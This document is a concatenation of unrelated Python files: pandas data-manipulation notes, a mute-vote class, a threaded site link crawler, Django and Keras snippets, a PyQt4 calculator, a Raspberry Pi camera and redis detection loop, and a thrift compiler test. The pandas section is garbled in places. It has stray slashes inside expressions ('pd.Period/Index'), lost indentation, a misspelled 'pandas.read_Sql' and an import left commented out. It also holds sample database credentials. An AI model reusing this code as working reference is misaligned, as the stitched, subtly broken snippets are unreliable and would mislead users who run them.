print(new_df)
#REGEX
new_df = df.replace('[A-Za-z]','',regex=True)
new_df = df.replace({
'Temp': '[A-Za-z]',
'Windspeed': '[A-Za-z]'
},'',regex=True)
print(new_df)
#LISTS
import pandas as pd
import numpy as np
df = pd.DataFrame({
'score':['exceptional', 'average', 'good', 'poor', 'average', 'exceptional'],
'student':['rob', 'maya', 'parthiv', 'tom', 'julian', 'erica']
})
print(df)
new_df = df.replace(['poor', 'average', 'good', 'exceptional'], [1, 2, 3, 4])
print(new_df)
#GROUP BY
import pandas as pd
import matplotlib.pyplot as plt
df = pd.read_csv('city.csv')
g = df.groupby('City')
print(df)
print(g)
for city, city_df in g:
print(city)
print(city_df)
print(g.get_group('Mumbai')) #group by mumbai city
print(g.max()) #Max of each city
print(g.mean()) #Mean or average per each city
print(g.describe())
print(g.plot())
plt.show(g)
#CONCAT DATAFRAMES
import pandas as pd
india_weather = pd.DataFrame({
'city': ['mumbai', 'delhi', 'bangalore'],
'temp':[23, 34, 28],
'humidity':[80, 60, 70]
})
print(india_weather)
usa_weather = pd.DataFrame({
'city': ['NY', 'chicago', 'arizona'],
'temp':[13, 4, 18],
'humidity':[85, 50, 75]
})
print(usa_weather)
print(pd.concat([india_weather, usa_weather]))
df = pd.concat([india_weather, usa_weather], ignore_index=True)
print(df)
df = pd.concat([india_weather, usa_weather], keys = ['india', 'usa'])
print(df)
print(df.loc['usa'])
print(df.loc['india'])
temp_weather = pd.DataFrame({
'city': ['mumbai', 'delhi', 'bangalore'],
'temp':[23, 34, 28]
}, index=[0, 1, 2])
humidity_weather = pd.DataFrame({
'city': [ 'delhi', 'mumbai'],
'humidity':[60, 80]
}, index=[1, 0])
df = pd.concat([temp_weather, humidity_weather], axis=1)
print(df)
s = pd.Series(['Humid', 'Dry', 'Rain'], name='event')
print(s)
df = pd.concat([temp_weather, s], axis=1)
print(df)
# MERGING IN PANDAS
# Pandas provides a single function, merge, as the entry point for all standard database join operations between DataFrame objects −
# pd.merge(left, right, how='inner', on=None, left_on=None, right_on=None,
# left_index=False, right_index=False, sort=True)
# Here, we have used the following parameters −
# left − A DataFrame object.
# right − Another DataFrame object.
# on − Columns (names) to join on. Must be found in both the left and right DataFrame objects.
# left_on − Columns from the left DataFrame to use as keys. Can either be column names or arrays with length equal to the length of the DataFrame.
# right_on − Columns from the right DataFrame to use as keys. Can either be column names or arrays with length equal to the length of the DataFrame.
# left_index − If True, use the index (row labels) from the left DataFrame as its join key(s).
# In case of a DataFrame with a MultiIndex (hierarchical), the number of levels must match the number of join keys from the right DataFrame.
# right_index − Same usage as left_index for the right DataFrame.
# how − One of 'left', 'right', 'outer', 'inner'. Defaults to inner. Each method has been described below.
# sort − Sort the result DataFrame by the join keys in lexicographical order.Defaults to True, setting to False will improve the performance substantially in many cases.
import pandas as pd
df1 = pd.DataFrame({
'city': ['mumbai', 'delhi', 'bangalore', 'kolkata'],
'temp':[23, 34, 28, 31],
'humidity':[80, 60, 65, 50]
})
df2 = pd.DataFrame({
'city': [ 'delhi', 'mumbai', 'kerala' ],
'temp':[34, 23, 32],
'humidity':[60, 80, 45]
})
df = pd.merge(df1, df2, on='city', how = 'inner') #bydefault how = 'inner'
df = pd.merge(df1, df2, on='city', how='outer', indicator=True) # contains all the data
df = pd.merge(df1, df2, on='city', how='left') # contains all the left join data
df = pd.merge(df1, df2, on='city', how='right') # contains all the right join data
df = pd.merge(df1, df2, on='city', suffixes=('_left', '_right'))
print(df)
# Pivot Table - Used to summarize and aggregate the data.
import pandas as pd
df = pd.read_csv('city_all.csv')
print(df)
df1 = df.pivot(index='Day', columns='City', values='Humidity')
df1 = df.pivot(index='Humidity', columns='City')
print(df1)
df2 = df.pivot_table(index='City', columns='Day', margins=True) #default aggfunc = mean
print(df2)
dff = pd.read_csv('weather1.csv')
dff['Day'] = pd.to_datetime(dff['Day'])
print(dff)
print(type(dff['Day'][0]))
df3 = dff.pivot_table(index=pd.Grouper(freq='M', key='Day'), columns='City')
print(df3)
# Reshape DataFrame Using Melt - Transform or Reshape Data.
import pandas as pd
df = pd.read_csv('Melt.csv')
print(df)
x = pd.melt(df, id_vars=['Day'])
print(x)
z = (x[x['variable'] == 'Chicago'])
print(z)
x1 = pd.melt(df, id_vars=['Day'], var_name='City', value_name='Temperature')
print(x1)
y = (x1[x1['City'] == 'Chicago'])
print(y)
# Stack and Unstack
import pandas as pd
pd.set_option('display.max_rows', 500)
pd.set_option('display.max_columns', 500)
pd.set_option('display.width', 1000)
df = pd.read_excel('Stack_Unstack.xlsx', header=[0, 1])
print(df)
print(df.stack())
print(df.stack(level=0))
print(df.unstack())
#Cross Tab - Frequency Distribution
import pandas as pd
import numpy as np
df = pd.read_csv('namom.csv')
print(df)
x = pd.crosstab(df.Nationality, df.Handedness) #shows freq that is number of time occurences.
print(x)
y = pd.crosstab(df.Sex, [df.Handedness, df.Nationality], margins = True)
y = pd.crosstab([df.Nationality, df.Sex], df.Handedness, margins = True)
y = pd.crosstab([df.Nationality], [df.Sex], normalize='index')
y = pd.crosstab([df.Nationality], [df.Sex], margins=True)
y = pd.crosstab([df.Sex], [df.Handedness], values=df.Age, aggfunc=np.average)
print(y)
# Read AND Write Data WITH THE DATABASES
# from sqlalchemy import create_engine
# NOTE(review): the import above is commented out, so every create_engine
# call below raises NameError unless it is restored.
engine = create_engine('postgresql://scott:tiger@localhost:5432/mydatabase')
engine = create_engine('mysql+mysqldb://scott:tiger@localhost/foo')
engine = create_engine('oracle://scott:tiger@127.0.0.1:1521/sidname')
engine = create_engine('mssql+pyodbc://mydsn')
# sqlite://<nohostname>/<path>
# where <path> is relative:
engine = create_engine('sqlite:///foo.db')
# or absolute, starting with a slash:
engine = create_engine('sqlite:////absolute/path/to/foo.db')
import pandas as pd
import sqlalchemy as sa
# urllib is a Python module that can be used for opening URLs. It defines functions and classes to help in URL actions. With Python you can also access and retrieve data from the internet (XML, HTML, JSON, etc.) and work with that data directly.
import urllib
params = urllib.parse.quote_plus("DRIVER={SQL Server Native Client 11.0};"
"SERVER=LAPTOP-4228MCME\SQLEXPRESS;"
"DATABASE=just;"
"UID=sa;"
"PWD=Password8")
engine = sa.create_engine("mssql+pyodbc:///?odbc_connect={}".format(params))
df = pd.read_sql_table('WORKER71', engine, columns=('FIRST_NAME', 'LAST_NAME', 'SALARY'))
print(df)
query = '''
Select W.FIRST_NAME, W.LAST_NAME, T.WORKER_TITLE
FROM WORKER71 W INNER JOIN TITLE T
ON W.WORKER_ID = T.WORKER_REF_ID
'''
df = pd.read_sql_query(query, engine)
print(df)
x = pd.read_csv('jobs1.csv')
x.rename(columns={
'workerid':'WORKER_ID',
'firstname': 'FIRST_NAME',
'lastname': 'LAST_NAME',
'salary': 'SALARY',
'date': 'JOINING_DATE',
'dept': 'DEPARTMENT'
}, inplace=True)
print(x)
df.to_sql(
name='WORKER71',
con=engine,
index=False,
if_exists='append'
)
pandas.read_Sql('workers71', engine) #we can also execute query here
#TIMESERIES ANALYSIS = Timeseries is a set of data points indexed in time order.
# M = MONTH; W = WEEK; Q = QUARTER
import pandas as pd
import matplotlib.pyplot as plt
df = pd.read_csv('appl.csv', parse_dates=['Date'], index_col='Date')
print(df)
print(df.index)
print(df['2017-01'])
print(df['2017-01'].Close.mean())
print(df['2017-01-03'])
print(df['2017-01-07':'2017-01-01'])
print(df['Close'].resample('M').mean())
x = df['Close'].resample('M').mean()
print(x)
x = df['Close'].resample('W').mean()
print(x)
x = df['Close'].resample('Q').mean()
print(x)
#TIMESERIES ANALYSIS
import pandas as pd
import numpy as np
df = pd.read_csv('appl_no_dates.csv')
print(df.head(5))
rng = pd.date_range(start='6/1/2016', end='6/30/2016', freq='B')
print(rng)
df.set_index(rng, inplace=True)
print(df.head())
print(df['2016-06-01':'2016-06-18'])
print(df['2016-06-01':'2016-06-18'].Close.mean())
print(df.asfreq('D', method='pad')) #WEEKENDS ALSO INCLUDED
print(df.asfreq('W', method='pad')) #WEEKLY
print(df.asfreq('H', method='pad')) #HOURLY
rng = pd.date_range(start='6/1/2016', periods=72, freq='H')
print(rng)
ts = np.random.randint(0, 10, len(rng))
ts = pd.Series(np.random.randint(0, 10, len(rng)), index=rng)
print(ts)
#HOLIDAYS
import pandas as pd
import numpy as np
from datetime import datetime
from pandas.tseries.holiday import USFederalHolidayCalendar
from pandas.tseries.holiday import AbstractHolidayCalendar, nearest_workday, Holiday
from pandas.tseries.offsets import CustomBusinessDay
df = pd.read_csv('appl_no_dates.csv')
print(df)
rng = pd.date_range(start='7/1/2017', end='7/21/2017', freq='B')
print(rng)
us_cal = CustomBusinessDay(calendar=USFederalHolidayCalendar())
rng = pd.date_range(start='7/1/2017', end='7/21/2017', freq=us_cal)
print(rng)
df.set_index(rng, inplace=True)
print(df)
class myCalendar(AbstractHolidayCalendar):
rules = [
Holiday('My Birth Day', month=4, day=12) #, observance=nearest_workday),
]
my_bday = CustomBusinessDay(calendar=myCalendar())
print(pd.date_range('4/1/2017','4/30/2017',freq=my_bday))
print(pd.date_range(start='4/1/2017', end='4/30/2017',freq=my_bday))
egypt_weekdays = "Sun Mon Tue Wed Thu"
b = CustomBusinessDay(weekmask=egypt_weekdays)
print(pd.date_range(start="7/1/2017",periods=20,freq=b))
b = CustomBusinessDay(holidays=['2017-07-04', '2017-07-10'], weekmask=egypt_weekdays)
print(pd.date_range(start="7/1/2017",periods=20,freq=b))
dt = datetime(2017, 7, 9, 0, 0)
print(dt)
print(dt+1*b)
#to_datetime
import pandas as pd
dates = ['2017-01-05', 'Jan 5, 2017', '01/05/2017', '2017.01.05', '2017/01/05','20170105']
print(pd.to_datetime(dates))
dt = ['2017-01-05 2:30:00 PM', 'Jan 5, 2017 14:30:00', '01/05/2016', '2017.01.05', '2017/01/05','20170105']
print(pd.to_datetime(dt))
print(pd.to_datetime('30-12-2016'))
print(pd.to_datetime('5-1-2016'))
print(pd.to_datetime('5-1-2016', dayfirst=True))
print(pd.to_datetime('2017$01$05', format='%Y$%m$%d'))
print(pd.to_datetime('2017#01#05', format='%Y#%m#%d'))
print(pd.to_datetime(['2017-01-05', 'Jan 6, 2017', 'abc'], errors='ignore'))
print(pd.to_datetime(['2017-01-05', 'Jan 6, 2017', 'abc'], errors='coerce'))
current_epoch = 1501324478
print(pd.to_datetime(current_epoch, unit='s'))
print(pd.to_datetime(current_epoch*1000, unit='ms'))
t = pd.to_datetime([current_epoch], unit='s')
print(t)
t.view('int64')
print(t)
# PERIOD AND PERIODINDEX
import pandas as pd
y = pd.Period('2016')
print(y)
print(y.start_time)
print(y.end_time)
print(y.is_leap_year)
m = pd.Period('2017-12', freq='M')
print(m)
print(m.start_time)
print(m.end_time)
print(m+1)
d = pd.Period('2016-02-28', freq='D')
print(d)
print(d.start_time)
print(d.end_time)
print(d+1)
h = pd.Period('2017-08-15 23:00:00',freq='H')
print(h)
print(h+1)
print(h+pd.offsets.Hour(1))
q1 = pd.Period('2017Q1', freq='Q-JAN')
print(q1)
print(q1.start_time)
print(q1.end_time)
print(q1.asfreq('M',how='start'))
print(q1.asfreq('M',how='end'))
w = pd.Period('2017-07-05',freq='W')
print(w)
print(w-1)
w2 = pd.Period('2017-08-15',freq='W')
print(w2)
print(w2-w)
r = pd.period_range('2011', '2017', freq='q')
print(r)
print(r[0].start_time)
print(r[0].end_time)
r1 = pd.period_range('2011', '2017', freq='q-jan')
print(r1)
print(r1[0].start_time)
print(r1[0].end_time)/
r2 = pd.PeriodIndex(start='2016-01', freq='3M', periods=10)
print(r2)
import numpy as np
ps = pd.Series(np.random.randn(len(r2)), r2)
print(ps)
print(ps.index)
print(ps['2016'])
print(ps['2016':'2017'])
pst = ps.to_timestamp()
print(pst)
print(pst.index)
x = pst.to_period()
print(x)
print(x.index)
df = pd.read_csv('wmt.csv')
print(df)
df.set_index('Line Item', inplace=True)
print(df)
df = df.T
print(df)
print(df.index)
df.index = pd.Period/Index(df.index, freq='Q-JAN')
print(df.index)
print(df.index[0].start_time)
df["Start Date"]=df.index.map(lambda x: x.start_time)
print(df)
df["End Date"]=df.index.map(lambda x: x.end_time)
print(df)
# #TimeZone Handling
# Two types of datetimes in python:-
# 1.Naive (no timezone awareness)
# 2.Timezone aware datetime
import pandas as pd
df = pd.read_csv("ms.csv",index_col='Date' ,parse_dates=['Date'])
print(df)
print(df.index)
df.tz_localize(tz='US/Eastern')
df.index = df.index.tz_localize(tz='US/Eastern')
print(df.index)
df = df.tz_convert('Europe/Berlin')
print(df)
print(df.index)
from pytz import all_timezones
print(all_timezones)
df.index = df.index.tz_convert('Asia/Calcutta')
print(df)
london = pd.date_range('3/6/2012 00:09:00', periods=10, freq='H',tz='Europe/London')
print(london)
td = pd.date_range('3/6/2012 00:00', periods=10, freq='H',tz='dateutil/Europe/London')
print(td)
rng = pd.date_range(start="2017-08-22 09:00:00",periods=10, freq='30min')
print(rng)
s = pd.Series(range(10),index=rng)
print(s)
b = s.tz_localize(tz="Europe/Berlin")
print(b)
print(b.index)
m = s.tz_localize(tz="Asia/Calcutta")
print(m)
print(m.index)
print(b+m)
# SHIFTING AND LAGGING
import pandas as pd
df = pd.read_csv("mj.csv",parse_dates=['Date'],index_col='Date')
print(df)
print(df.shift(1))    # values move down one row (previous day's price)
print(df.shift(-1))   # values move up one row (next day's price)
df['Prev_Day_Price'] = df['Price'].shift(1)
df['Price_Change'] = df['Price'] - df['Prev_Day_Price']
df['5_day_return'] = (df['Price'] - df['Price'].shift(5))*100/df['Price'].shift(5)
df = df[['Price']]
print(df)
print(df.index)
df.index = pd.date_range(start='2017-08-15',periods=10, freq='B')
print(df)
print(df.index)
# BUG FIX: DataFrame.tshift() was deprecated in pandas 1.1 and removed in 2.0.
# shift(freq=...) moves the *index* instead of the values, which is exactly
# what tshift(1) did on this business-day index.
print(df.shift(1, freq='B'))
|
import threading
class Vote:
    """A timed mute vote.

    Tracks which of the eligible ``voters`` have confirmed a vote to mute
    ``mutee``; the vote deactivates itself 10 seconds after activate().
    """

    def __init__(self, voters, mutee):
        # BUG FIX: voters/confirmed/active/mutee/timer were *class*
        # attributes, so the ``confirmed`` list (mutated via append) was
        # shared by every Vote instance.  All state is now per-instance.
        self.voters = voters     # members eligible to vote
        self.confirmed = []      # members who have voted yes
        self.active = False
        self.mutee = mutee       # person to be muted
        self.timer = threading.Timer(10, self.stop)  # auto-expiry timer

    def activate(self):
        """Start the vote and its 10-second expiry timer."""
        self.active = True
        self.timer.start()

    def confirm(self, member):
        """Record *member*'s yes-vote; returns the message to respond with."""
        # check if user is a valid voter
        if member not in self.voters:
            return f"Sorry, {member.mention}, you cannot vote in this election!"
        if member not in self.confirmed:
            self.confirmed.append(member)
            return f"Thank you for your vote {member.mention}! Now at {len(self.confirmed)}/{len(self.voters)}"
        return f"Naughty naughty! You already voted {member.mention}"

    def is_majority(self):
        """True once a strict majority has confirmed; cancels the timer."""
        if len(self.confirmed) > (len(self.voters) / 2):
            self.timer.cancel()
            return True
        return False

    def stop(self):
        """Deactivate the vote (called by the expiry timer)."""
        self.active = False
|
import requests
import argparse
import sleek_logger
import re
import hashlib
import threading
import queue
MAX_NUM_THREADS = 5
class RequestMachine(object):
    """Threaded crawler: breadth-first walk of every local href under a URL."""

    def __init__(self, *args, **kwargs):
        args = self.parse_args()
        self.url = args.url
        self.extension = self.url.split('.')[-1]
        self.logged = {}            # md5(url) -> url; visited set for de-dup
        self.queue = queue.Queue()  # work queue consumed by the workers
        self.threads = []
        self.hasher = hashlib.md5
        self.logger = sleek_logger.SleekLogger('SiteTrav.log')
        self.jobs = []              # URLs currently being processed
        # BUG FIX: start the worker threads only after every attribute they
        # touch (hasher, logger, jobs) exists.  The original called
        # init_threads() before assigning them, so a fast first response
        # could crash a worker with AttributeError.
        self.init_threads()
        self.scrape_urls(self.url)

    def worker(self):
        """Worker loop: fetch a URL and enqueue every new local link on it."""
        while True:
            current = self.queue.get()
            self.jobs.append(current)
            if current is None:  # poison pill -> shut this worker down
                break
            try:
                resp = requests.get(current).text
            except requests.exceptions.ConnectionError:
                self.logger.log('Error handling ' + current, 'error')
            else:
                # Extract href targets; keep only unseen same-site links
                # (relative paths or fragments).
                matches = re.findall('href=[\'"]?([^\'" >]+)', resp)
                for match in matches:
                    new_url = self.url + match
                    _hash = self.hasher(new_url.encode()).hexdigest()
                    if _hash in self.logged or (not match.startswith('/') and not match.startswith('#')):
                        continue
                    else:
                        self.logged[_hash] = new_url
                        self.logger.log('Traversing: ' + new_url)
                        self.scrape_urls(new_url)
            self.jobs.remove(current)
            # NOTE(review): jobs is a plain list shared between threads, so
            # this emptiness check is racy; kept as the original best-effort
            # termination signal.
            if len(self.jobs) == 0:
                self.add_poison()

    def add_poison(self):
        """Queue one poison pill (None) per worker so they all exit."""
        for t in self.threads:
            self.queue.put(None)

    def init_threads(self):
        """Spawn the worker thread pool."""
        for i in range(MAX_NUM_THREADS):
            t = threading.Thread(target=self.worker)
            t.start()
            self.threads.append(t)

    def parse_args(self):
        """Parse the command line; a single positional target URL."""
        parser = argparse.ArgumentParser(description='Args for brute forcing requests.')
        parser.add_argument('url', help='target url')
        args = parser.parse_args()
        return args

    def test_connection(self):
        """True when the start URL answers with HTTP 200."""
        # FIX: removed the unused local 'counter = 0' left over from an
        # earlier version.
        return requests.get(self.url).status_code == 200

    def scrape_urls(self, current):
        """Enqueue *current* for a worker to process."""
        self.queue.put(current)
# Script entry point: constructing the machine immediately starts the crawl.
if __name__ == '__main__':
    x = RequestMachine()
|
import datetime
# FIX: datetime.utcnow() is deprecated (Python 3.12+) because it returns a
# *naive* datetime; now(timezone.utc) is the timezone-aware replacement.
utc_now = datetime.datetime.now(datetime.timezone.utc)
print(utc_now)
time_now = datetime.datetime.now()  # local wall-clock time (naive)
year = time_now.year
month = time_now.month
day = time_now.day
weekday = time_now.weekday()        # Monday == 0 ... Sunday == 6
print("Day {}, date is {} month is {} and year is {}".format(weekday, day, month, year))
|
from django.conf.urls import url, include
from rest_framework import routers
from . import views
# DRF router: auto-generates list/detail routes for each registered ViewSet.
router = routers.DefaultRouter()
router.register(r'products', views.ProductViewSet)
router.register(r'departments', views.DepartmentViewSet)
router.register(r'features', views.FeatureViewSet)
# Namespace for reverse() lookups, e.g. 'catalog:product-list'.
app_name = 'catalog'
urlpatterns = [
    url(r'^', include(router.urls))
]
|
from keras.datasets import cifar10
def load_cifar10():
    """Fetch the pre-shuffled CIFAR-10 train/test split with pixels in [0, 1].

    Returns (x_train, y_train, x_test, y_test).
    """
    (x_train, y_train), (x_test, y_test) = cifar10.load_data()
    # Convert the uint8 images to floats and normalize in a single step.
    x_train = x_train.astype('float32') / 255
    x_test = x_test.astype('float32') / 255
    print('x_train shape:', x_train.shape)
    print(x_train.shape[0], 'train samples')
    print(x_test.shape[0], 'test samples')
    return x_train, y_train, x_test, y_test
import time
# FIX: time.perf_counter() is the correct clock for measuring elapsed time —
# it is monotonic and high-resolution, unlike time.time(), which can jump if
# the system clock is adjusted mid-measurement.
begin = int(round(time.perf_counter() * 1000))
for i in range(100000):
    print(i)
final = int(round(time.perf_counter() * 1000))
print(final - begin)  # elapsed milliseconds
# Generated by Django 2.2.4 on 2021-08-26 04:30
from django.db import migrations
class Migration(migrations.Migration):
    """Auto-generated schema migration: renames DiabDB.result to result1."""

    dependencies = [
        ('home', '0005_diabdb'),
    ]
    operations = [
        migrations.RenameField(
            model_name='diabdb',
            old_name='result',
            new_name='result1',
        ),
    ]
|
#!/usr/bin/python
'''
@package calculator_app
@brief
@details
@author Remus Avram
@date 2014.12
'''
import sys
import os
import operator
from PyQt4 import QtCore, QtGui
from calculatorWinUI import Ui_CalculatorWindow
from calcWidgetUI import Ui_Calculator
class Window(QtGui.QMainWindow, Ui_CalculatorWindow):
    """Main window: hosts the Calculator widget and wires up the Clear action."""
    def __init__(self, *args, **kwargs):
        super(Window, self).__init__(*args, **kwargs)
        self.setupUi(self)
        # Embed the calculator widget as the central widget.
        self.calcWidget = Calculator()
        self.setCentralWidget(self.calcWidget)
        # The menu's "Clear" action resets the calculator's fields.
        self.actionClear.triggered.connect(self.calcWidget.clear)
    # END def __init__
# END class Window
class Calculator(QtGui.QWidget):
    """Calculator widget: live-evaluates "inputA <op> inputB" as the user types."""
    # Maps the operator symbol shown in the combo box to its function.
    # NOTE(review): operator.div exists only on Python 2; this file targets
    # Python 2 (see the old-style "except Exception, e" below).
    OPS = {
        '+': operator.add,
        '-': operator.sub,
        '/': operator.div,
        '*': operator.mul
    }
    def __init__(self, *args, **kwargs):
        super(Calculator, self).__init__(*args, **kwargs)
        self.ui = Ui_Calculator()
        self.ui.setupUi(self)
        # Only accept numeric input in the two operand fields.
        self.ui.inputA.setValidator(QtGui.QDoubleValidator(self))
        self.ui.inputB.setValidator(QtGui.QDoubleValidator(self))
        self.ui.operatorBox.clear()
        self.ui.operatorBox.addItems(self.OPS.keys())
        self.ui.clearButton.clicked.connect(self.clear)
        # Recompute the result whenever an operand or the operator changes.
        self.ui.inputA.textEdited.connect(self.calc)
        self.ui.inputB.textEdited.connect(self.calc)
        self.ui.operatorBox.currentIndexChanged.connect(self.calc)
    # END def __init__
    def clear(self):
        ''' Slot: clear the two operand fields and the result display. '''
        self.ui.inputA.clear()
        self.ui.inputB.clear()
        self.ui.result.clear()
    # END def clear
    def calc(self):
        ''' Slot: evaluate the current expression and show the result. '''
        op_str = str(self.ui.operatorBox.currentText())
        op = self.OPS.get(op_str)
        if not op:
            return
        inputA = self.ui.inputA.text()
        inputB = self.ui.inputB.text()
        # Wait until both operands have been entered.
        if not (inputA and inputB):
            return
        try:
            i1 = float(inputA)
            i2 = float(inputB)
            result = op(i1, i2)
        except Exception, e:
            # Division by zero (and any parse failure) lands here.
            QtGui.QMessageBox.warning(self, "Could not calculate result",
                                      "Result: \n%s" %e)
        else:
            self.ui.result.setText(str(result))
# END class Calculator
def main():
    """Create the Qt application, show the main window, and run the event loop."""
    app = QtGui.QApplication(sys.argv)
    win = Window()
    win.show()
    win.raise_()  # bring the window to the front
    sys.exit(app.exec_())
if __name__ == "__main__": main()
# -*- coding: utf-8 -*-
import utils.detection_utils as du
import utils.detection_parameters as p
import redis
import pickle
from picamera.array import PiRGBArray
from picamera import PiCamera
import time
# Shared redis connection used to exchange commands/results with clients.
r = redis.StrictRedis(host=p.parameters_redis["host"], port=p.parameters_redis["port"], db=0)
# Command flags: a client sets one to '1' to trigger the matching action in
# loop_camera_redis(); the loop resets it to '0' when done.
r.set("start",'0')
r.set("calibrate_fields",'0')
r.set("calibrate_image",'0')
r.set("calibrate_goals",'0')
# Result slots; all result values are pickled before being stored.
r.set("crops",pickle.dumps(None))
r.set("total_results",pickle.dumps(None))
r.set("results",pickle.dumps(None))
r.set("goals_positions",pickle.dumps({}))
r.set("goals_definitions",pickle.dumps(None))
# Module-level detection state shared by the functions below.
positions = None          # field positions found during calibration
crops = None              # crop coordinates of each detected field
angles = None             # rotation angle of each detected field
total_results = None      # full per-field detection output
results = None
crops_img = None          # cropped/rotated field image data
goals_positions = {}      # field -> {goal key -> position}
goals_definitions = None  # presumably (field, team, thymio, goal-key) tuples — see get_football_goals
def get_calibrate_football_fields(image):
    """Detect the fields in *image* and cache positions/angles/crops.

    The results are stored in module-level globals so later frames can be
    cropped without re-running the (slow) field detection.
    """
    global positions,crops,crops_img,angles
    positions,angles = du.calibrate_football_fields(image,p.parameters_fields_ld)
    crops, crops_img = du.crop_rotate_image(image,positions,angles)
    return crops
def get_calibrate_image(image):
    """Re-crop *image* using the cached field positions/angles.

    Requires get_calibrate_football_fields() to have run at least once.
    """
    global positions,crops,crops_img,angles
    crops, crops_img = du.crop_rotate_image(image,positions,angles)
    return crops, crops_img
def get_football_field():
    """Run ball/robot detection on the cached field crops.

    Updates the module-level state and returns (total_results, results).
    """
    global total_results,results,angles,positions,crops_img
    total_results, positions,angles, results = du.analyse_all_fields(angles,positions,p.hsv_ball,p.parameters_ball,p.teams_hsv_to_analyse,p.parameters_thymio_ld,p.parameters_dots_ld,p.parameters_directions,crops_img)
    return total_results,results
def get_position(field=None, team=None, thymio_number=None):
    """Return the detection entry for *thymio_number* of *team* on *field*.

    Runs a fresh detection pass; returns None when not found.
    """
    total_results, results = get_football_field()
    # ROBUSTNESS FIX: the original evaluated ``field < len(total_results)``
    # even when field was left at its None default, which raises TypeError
    # on Python 3.  Guard the default explicitly.
    if total_results is not None and field is not None:
        if field < len(total_results):
            if team in total_results[field]:
                for th in total_results[field][team]:
                    # th[0] holds the thymio id; return the whole entry.
                    if thymio_number == th[0]:
                        return th
    return None
def get_football_goals():
    """Refresh goal positions from the goal definitions stored in redis.

    Each definition g is indexed as (field, team, thymio_number, goal key);
    the detected position of that thymio becomes the goal's position.
    """
    # FIX: the original global statement listed goals_definitions twice;
    # goals_positions is only mutated in place so no global is needed for it.
    global goals_definitions, total_results
    goals_definitions = pickle.loads(r.get('goals_definitions'))
    get_football_field()
    for g in goals_definitions:
        pos = get_position(field=g[0], team=g[1], thymio_number=g[2])
        # pos[3] is the detected coordinate; skip thymios that were not seen.
        if pos is not None and pos[3] is not None:
            if g[0] not in goals_positions:
                goals_positions[g[0]] = {}
            goals_positions[g[0]][g[3]] = pos[3]
    return goals_positions
def init_camera():
    """Configure the PiCamera and a matching raw-capture buffer.

    Returns (camera, rawCapture) ready for capture_continuous().
    """
    camera = PiCamera()
    camera.resolution = p.picamera['resolution']
    camera.framerate = p.picamera['framerate']
    rawCapture = PiRGBArray(camera, size=p.picamera['resolution'])
    return camera, rawCapture
def print_start_stop(prev_start, start):
    """Log a transition of the redis "start" flag.

    Prints "Server started !" when the flag leaves '0' and
    "Server stopped !" otherwise.  Both arguments are the raw bytes
    returned by redis, or None when the key is missing.
    """
    # BUG FIX: also guard prev_start — the original called
    # prev_start.decode() unconditionally and crashed with AttributeError
    # when the key had not been set yet.
    if start is not None and prev_start is not None \
            and start.decode("utf-8") != prev_start.decode("utf-8"):
        if prev_start.decode("utf-8") == "0":
            print("Server started !")
        else:
            print("Server stopped !")
def loop_camera_redis():
    """Main camera loop: grab frames and service the calibration/detection
    commands that clients post as flags in redis."""
    global positions,crops,angles,total_results,results,crops_img
    start = r.get("start")
    camera, rawCapture = init_camera()
    # allow the camera to warmup
    time.sleep(0.1)
    # capture frames from the camera
    for frame in camera.capture_continuous(rawCapture, format=p.picamera['format'], use_video_port=True):
        # VARIABLES
        image = frame.array
        image = image[::-1,...,:]  # flip the frame vertically
        print_start_stop(start, r.get("start"))
        start = r.get("start")
        calibrate_fields = r.get("calibrate_fields")
        calibrate_image = r.get("calibrate_image")
        calibrate_goals = r.get("calibrate_goals")
        # FIELD CALIBRATION
        if calibrate_fields is not None and calibrate_fields.decode("utf-8") == '1':
            print("Début de calibration des terrains")
            get_calibrate_football_fields(image)
            r.set('crops',pickle.dumps(crops))
            r.set("calibrate_fields",'0')
            print("Calibration des terrains terminée")
        # IMAGE CALIBRATION
        if calibrate_image is not None and calibrate_image.decode("utf-8") == '1':
            print("Début de calibration de l'image")
            get_calibrate_image(image)
            r.set('crops',pickle.dumps(crops))
            r.set("calibrate_image",'0')
            print("Calibration de l'image terminée")
        # GOALS CALIBRATION
        if calibrate_goals is not None and calibrate_goals.decode("utf-8") == '1':
            print("Début de la calibration des buts")
            get_football_goals()
            # BUG FIX: every other value stored in redis is pickled (and this
            # key is initialised with pickle.dumps at module load); storing
            # the raw dict raises redis.DataError and breaks readers that
            # pickle.loads() the value.
            r.set("goals_positions",pickle.dumps(goals_positions))
            r.set('calibrate_goals','0')
            print("Calibration des buts terminée")
        # REAL TIME DETECTION
        if start is not None and start.decode("utf-8") == '1':
            get_calibrate_image(image)
            get_football_field()
            r.set('total_results',pickle.dumps(total_results))
            r.set('results',pickle.dumps(results))
        # clear the stream in preparation for the next frame
        rawCapture.truncate(0)
# Entry point: runs forever, servicing redis commands frame by frame.
print("Scanner loaded... and loop started.")
loop_camera_redis()
|
"""
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import unittest2
from tests.helper_tools import HelperTools
from thrift_medusa.utils.config import Config
from thrift_medusa.thrift.thrift_compiler import ThriftCompiler
class ThriftCompilerTest(unittest2.TestCase):
    """Tests for ThriftCompiler: config-driven properties and their defaults."""

    def setUp(self):
        # A fully-populated compiler description.
        self.yaml = {
            'name': 'thrift',
            'bin': '/bin/',
            'options': 'SuperOption',
            'supported_languages': ['a', 'b', 'c'],
            'compiler_postfix': 'postfix',
            'version': '1.2.3.4',
        }
        self.compiler = ThriftCompiler(self.yaml)

    def test_version(self):
        """version is read from the config and is writable."""
        # FIX throughout: assertEquals is a long-deprecated alias of
        # assertEqual.
        expected = self.yaml['version']
        self.assertEqual(expected, self.compiler.version)
        expected = HelperTools.get_random()
        self.compiler.version = expected
        self.assertEqual(expected, self.compiler.version)

    def test_bin(self):
        """bin is read from the config and is writable."""
        expected = self.yaml['bin']
        self.assertEqual(expected, self.compiler.bin)
        expected = HelperTools.get_random()
        self.compiler.bin = expected
        self.assertEqual(expected, self.compiler.bin)

    def test_name(self):
        """name is read from the config and is writable."""
        expected = self.yaml['name']
        self.assertEqual(expected, self.compiler.name)
        expected = HelperTools.get_random()
        self.compiler.name = expected
        self.assertEqual(expected, self.compiler.name)

    def test_options(self):
        """options is read from the config and is writable."""
        expected = self.yaml['options']
        self.assertEqual(expected, self.compiler.options)
        expected = HelperTools.get_random()
        self.compiler.options = expected
        self.assertEqual(expected, self.compiler.options)

